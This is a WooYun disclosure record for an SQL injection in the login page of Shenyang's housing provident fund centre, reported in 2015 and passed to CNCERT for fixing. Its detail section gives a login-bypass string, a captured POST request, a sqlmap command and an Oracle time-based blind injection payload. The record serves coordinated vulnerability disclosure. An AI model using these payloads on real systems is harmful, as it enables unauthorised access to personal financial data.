当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165906

漏洞标题:沈阳市住房公积金管理中心存在SQL注入漏洞

相关厂商:http://www.sygjj.com

漏洞作者: 毛毛虫

提交时间:2015-12-30 11:50

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2016-01-06: 厂商已经确认,细节仅向厂商公开
2016-01-16: 细节向核心白帽子及相关领域专家公开
2016-01-26: 细节向普通白帽子公开
2016-02-05: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

某市住房公积金管理中心存在SQL注入漏洞!

详细说明:

1.沈阳市住房公积金管理中心漏洞地址

http://**.**.**.**:8080/cxxt/unit/loginunit.jsp


1.jpg


2.单位公积金用户名和密码处输入拼接语句'or'1'='1 可以成功登录并获取个人缴费信息。
3.利用burpsuite抓包获取数据,保存至D盘2.txt
POST /cxxt/unitGjjAction/queryByUnitGjjAction.action HTTP/1.1
Host: **.**.**.**:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8080/cxxt/unit/loginunit.jsp
Cookie: JSESSIONID=YqlcWCpG2Qmk5sjjMgdhN49JQGJd81VP2GCfYRZ21LvX1gT25vpC!-2123065685; _gscu_1721107908=514006744p6mcs24; _gscs_1721107908=51400674gnozxg24|pv:7; _gscbrs_1721107908=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
userName=123*&password=456*&randUnit=qkczec&submit=%E6%8F%90%E4%BA%A4
4.利用sqlmap进行注入测试,获取数据库类型为Oracle,注入类型为POST,命令为sqlmap.py -r d:\2.txt --risk=3 -v 3 --dbs
sqlmap identified the following injection points with a total of 271 HTTP(s) req
uests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userName=123' AND 7178=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(115)|
|CHR(70)||CHR(97),5) AND 'jSje'='jSje&password=456&randUnit=qkczec&submit=%E6%8F
%90%E4%BA%A4
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAG
E('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
---
[23:05:20] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
---------以上点能够获取信息,说明该处存在注入点,亲,赶紧修复一下吧----------

漏洞证明:

2.jpg


4.jpg

修复方案:

过滤或参数化查询

版权声明:转载请注明来源 毛毛虫@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-06 16:04

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给辽宁分中心,由其后续协调网站管理单位处置.

最新状态:

暂无